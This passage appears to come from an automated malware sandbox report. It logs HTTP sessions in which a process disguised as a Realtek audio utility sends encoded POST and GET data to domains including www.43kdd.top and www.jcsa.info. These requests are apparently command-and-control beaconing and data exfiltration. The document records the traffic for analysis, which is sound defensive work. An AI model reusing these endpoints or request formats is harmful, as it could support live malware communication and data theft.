                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            28192.168.11.2049777101.35.209.183807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:45.905855894 CET487OUTGET /31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.yc791022.asia
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:46.253573895 CET427INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:56:46 GMT
                                                                            Server: Apache
                                                                            Content-Length: 263
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            29192.168.11.204977838.47.232.202807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:52.088087082 CET746OUTPOST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 32 32 64 54 45 62 59 49 73 5a 48 6e 75 79 6b 64 4b 72 34 55 6c 42 61 55 39 79 4c 68 54 6a 71 35 63 6f 7a 71 33 76 45 2f 32 56 4c 53 57 65 4f 33 4f 4e 37 62 36 7a 78 49 49 6e 75 58 78 66 41 36 65 41 58 2f 6d 48 49 41 57 7a 41 52 6a 4f 37 36 74 34 33 75 49 59 6e 43 4d 52 52 36 43 50 51 30 6b 6e 4a 72 49 47 4d 71 4b 61 6f 5a 53 63 39 62 79 52 57 65 71 49 71 2b 6a 76 57 78 4e 79 6b 67 67 51 6e 64 6d 78 57 38 32 44 49 53 4c 59 32 74 36 54 41 37 4b 71 44 44 76 4a 4e 57 30 38 42 30 6a 64 38 4c 4f 5a 6d 30 6b 41 7a 47 38 77 37 4d 4f 6b 6f 31 67 3d 3d
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdj22dTEbYIsZHnuykdKr4UlBaU9yLhTjq5cozq3vE/2VLSWeO3ON7b6zxIInuXxfA6eAX/mHIAWzARjO76t43uIYnCMRR6CPQ0knJrIGMqKaoZSc9byRWeqIq+jvWxNykggQndmxW82DISLY2t6TA7KqDDvJNW08B0jd8LOZm0kAzG8w7MOko1g==
                                                                            Dec 3, 2024 18:56:52.441274881 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:52 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            30192.168.11.204977938.47.232.202807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:54.974092007 CET766OUTPOST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 63 42 43 4d 4a 54 4f 4d 6c 7a 6f 6c 36 66 4e 36 50 6c 75 32 53 46 49 49 38 75 47 56 6a 6f 39 58 63 3d
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
                                                                            Dec 3, 2024 18:56:55.327203989 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            31192.168.11.204978038.47.232.202807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:56:57.858030081 CET2578OUTPOST /p3j6/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            Origin: http://www.43kdd.top
                                                                            Referer: http://www.43kdd.top/p3j6/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 49 4e 70 69 4e 4b 47 34 6f 55 6b 6b 59 57 4b 34 4a 32 4d 2b 6b 69 6c 55 79 51 44 4a 62 52 78 51 53 44 4c 4b 67 30 66 47 72 35 6f 44 6b 71 66 62 2f 43 4a 4f 5a 42 64 46 50 43 42 6f 59 61 62 43 53 31 79 6d 54 7a 64 72 37 55 6e 76 6c 59 64 35 59 52 78 54 4d 77 65 79 7a 67 45 46 72 70 50 45 63 52 43 34 61 5a 63 2f 4a 54 46 56 72 37 58 7a 75 39 43 6f 68 2f 54 42 2f 30 4d 36 51 43 6f 2b 30 54 32 39 4d 63 79 67 39 39 79 64 55 6e 6b 77 30 55 52 65 58 34 59 41 71 58 2b 56 41 6a 6d 6c 43 6c 63 2b 2b [TRUNCATED]
                                                                            Data Ascii: 2O=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUINpiNKG4oUkkYWK4J2M+kilUyQDJbRxQSDLKg0fGr5oDkqfb/CJOZBdFPCBoYabCS1ymTzdr7UnvlYd5YRxTMweyzgEFrpPEcRC4aZc/JTFVr7Xzu9Coh/TB/0M6QCo+0T29Mcyg99ydUnkw0UReX4YAqX+VAjmlClc++PEIkOW62PVndItNl5W06rreFycQ77gdJJxibRRqR1kHcrNo2itPCbnvTOhkE+qrZcYEFvO9rF0YibJ4EKsbb76L8ZIxDeZWokM5Ct3OLpAKovb3AXZzTwzgnhIA00HGwqTE+SWYHocGezh/2YH2n+O/Q9BuJeTF+RzbmHq5EAlD+M1VB3yC3IfwT0x4kjpXQktFwj5G9QhXDgcNEt6XuSaeC/FvZgHk7AGwmyW03ayf5qStkjRtXKqPApYlQTYTSERl/l8xfjOBrHJODInzXHnPZDAzi7V3jWFCugMRY32EpWDAPT98VU1dstyja03UETmtfjgrpBSx6Z4KgKEeWjiNgnrQNu44Txucal2kt1QDDu6P1DfQrHkBGlX3Un/i+nwfpsvtYKw8K51kQUlbsKHygsLVdJ0z7wRwGinyasKWBLFQKnSIMb4vnXSg/Ze7BV0zrmeRvsduaJfE8pwyFLMX9R3BOai9EdJDMxm0cKOAspUbFSFUhF+E+3weloXh1PHFFpFdg3QM5yChRLYLbDJeUfe9NOVbuT8/8BzIAzY8a6gK6UPzKCU258ZNwglQT4CCAW8t+G6tRueUFS73KYKZeelwaTP4i0CRMh2riEr7Msc3eqszoKndWqHuzgv7Yz/CMnVWEi/Q+Gc9/q8zf8NRlkWMuCUEmhg [TRUNCATED]
                                                                            Dec 3, 2024 18:56:57.858108997 CET5337OUTData Raw: 4c 53 51 50 68 62 57 70 39 6f 74 75 2b 61 59 47 48 48 77 74 39 4d 51 35 52 53 76 54 65 46 52 74 64 66 70 71 71 4b 58 53 7a 43 33 51 4f 44 76 62 75 2b 45 63 61 64 35 6b 42 2f 42 6f 67 34 4a 66 62 45 63 34 4f 70 56 63 4a 72 70 4d 46 32 59 50 7a 4f
                                                                            Data Ascii: LSQPhbWp9otu+aYGHHwt9MQ5RSvTeFRtdfpqqKXSzC3QODvbu+Ecad5kB/Bog4JfbEc4OpVcJrpMF2YPzO/Kd/HX/nItIOGIGVYH9C/x2Kt2BTiVac/cG6VcVyX7HJB/oKG29o24u2Lf6cajeHp22yZC+HY6v96K+jhsFqKoN59SoTEPVkmZgF+2RZcz3IiV60Mq0TBxul6LT95qMlh4x75wHg+GMwW1SD0JNrkGlVbXqilhMgI
                                                                            Dec 3, 2024 18:56:58.206913948 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:56:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            32192.168.11.204978138.47.232.202807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:00.735588074 CET483OUTGET /p3j6/?2O=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.43kdd.top
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:01.088193893 CET312INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 03 Dec 2024 17:57:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 148
                                                                            Connection: close
                                                                            ETag: "66df9b06-94"
                                                                            Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            33192.168.11.2049782208.91.197.39807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:06.579806089 CET746OUTPOST /hxi5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            Origin: http://www.jcsa.info
                                                                            Referer: http://www.jcsa.info/hxi5/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 53 46 38 6a 50 4d 33 4d 2b 54 32 59 43 49 50 46 57 47 31 49 58 4b 75 52 63 6f 55 6d 4a 57 4c 6a 44 41 3d 3d
                                                                            Data Ascii: 2O=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6SF8jPM3M+T2YCIPFWG1IXKuRcoUmJWLjDA==


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            34192.168.11.2049783208.91.197.39807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:09.255850077 CET766OUTPOST /hxi5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            Origin: http://www.jcsa.info
                                                                            Referer: http://www.jcsa.info/hxi5/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 79 6a 59 59 74 4f 4c 55 4b 34 65 4b 64 78 55 78 4d 4f 38 51 48 39 79 59 74 4c 66 69 4f 41 63 72 49 3d
                                                                            Data Ascii: 2O=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZyjYYtOLUK4eKdxUxMO8QH9yYtLfiOAcrI=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            35192.168.11.2049784208.91.197.39807608C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Dec 3, 2024 18:57:11.942780972 CET2440OUTPOST /hxi5/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.jcsa.info
                                                                            Origin: http://www.jcsa.info
                                                                            Referer: http://www.jcsa.info/hxi5/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Raw: 32 4f 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 69 36 48 42 5a 6a 62 61 47 39 37 47 49 58 76 5a 72 51 34 4c 53 61 47 58 37 5a 30 64 7a 63 63 79 41 44 46 7a 35 4a 52 4e 33 48 46 66 75 47 46 37 6f 77 33 47 35 4c 36 65 56 36 70 68 4e 77 45 51 38 41 52 2b 63 78 6c 45 76 4e 77 56 71 47 5a 5a 4d 47 31 53 57 4e 51 33 67 31 61 41 43 55 50 4a 31 59 33 49 7a 67 37 75 55 30 6e 47 78 53 47 74 51 57 43 54 77 69 77 67 51 4d 65 4d 77 41 67 55 6e 32 6b 47 51 69 42 52 65 73 62 46 36 55 66 38 6b 70 45 71 4c 5a 4f 76 78 46 6c 6f 67 54 47 4a 6d 6c 79 5a 4b 69 [TRUNCATED]
                                                                            Data Ascii: 2O=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6i6HBZjbaG97GIXvZrQ4LSaGX7Z0dzccyADFz5JRN3HFfuGF7ow3G5L6eV6phNwEQ8AR+cxlEvNwVqGZZMG1SWNQ3g1aACUPJ1Y3Izg7uU0nGxSGtQWCTwiwgQMeMwAgUn2kGQiBResbF6Uf8kpEqLZOvxFlogTGJmlyZKikR4kjFv1KCh5Dvd+NCQrpTdjNz3Q/6eJAWYuHzTXWlW4PGGIVlQnRrgBT4g730Ukn4PU0hbOXamx0pOLGDG5fN0MLvYj6jkKgF+87DQouukdhJl4nLpQ2aplx4PZoBue+7fWhIUp/wTthfAyFcQza5J3mzq1KA0z4HYMCrV4N0l6F+YrRONtgMfGzzNlCSmcKjEhx5Yy1qEqqtI0ymbhfcUX81nLLcJgy/fAAxYX+jBLD/oQsSP/ethucWi/2HB+ZELMJ24CxmQbURIQ560Txw/LQw+Y4ojhgUKojIEPmUUA8MGXWkjya2tnu2EmawUWUgmXaJmb88A+4shHzTpyAb4gU4LSUFBKBY/eg1qfbFGS5U12gwQGuE87RzpfRfMjMIf8fPBWR8CV1knzsZWlcFAme72Y/p032z2gWtEzxXRu/PoEha1lfoaZ/KEiQt7A/anbhTvC7Z+q47iaSilYT5lMl2dOFpdyTAnV9Fpd3IVcE+7a2LcsxHqsD5d/E4CVwbh91bF082dbSR1F/ASXcOa/PxbUf6f1FelSIe0qen5NP91VGtGFhv1o/IuEUCn8t3/4Vy9WN4lNMjVpuPDZ9cFUn+Fu+EX5kGyj+zaqgsU4rJvvAYD+EAkoes3V25eAsKp1zPC7WjgIclE1iXt9LRBXBbMF6TAX6l [TRUNCATED]
                                                                            Dec 3, 2024 18:57:11.942831039 CET5475OUTData Raw: 67 56 56 57 31 55 6a 4d 6a 62 50 64 78 6a 4b 70 6d 66 6e 79 62 66 4a 64 6c 64 53 38 63 73 5a 48 53 66 68 37 76 72 35 70 30 4c 74 39 37 69 66 7a 48 4c 39 6a 78 65 7a 68 35 61 50 70 59 76 2f 6d 67 39 77 57 4a 59 2b 39 55 74 51 36 2b 68 73 75 48 76
